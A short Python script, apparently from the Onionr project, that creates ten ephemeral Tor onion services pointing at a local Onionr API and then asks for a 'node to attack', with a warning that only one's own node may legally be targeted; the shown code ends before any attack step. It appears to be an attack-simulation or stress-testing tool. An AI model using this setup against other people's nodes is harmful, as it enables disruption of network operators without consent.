import sys import os import stem if not os.path.exists(''): os.chdir('../') sys.path.append("src/") from onionrutils import stringvalidators from onionrutils import basicrequests from stem.control import Controller onionr_ip = input("onionr ip address: ") onionr_port = int(input("Enter onionr public api port: ")) controller = Controller.from_port('', int(input("Enter tor controller port: "))) controller.authenticate() for i in range(10): response = controller.create_ephemeral_hidden_service({80: f'{onionr_ip}:{onionr_port}'}, await_publication=True) print(response.service_id) node = input("Enter node to attack. Note that you legally must use your own, and even that might lead to technical or legal issues") assert stringvalidators.validate_transport(node)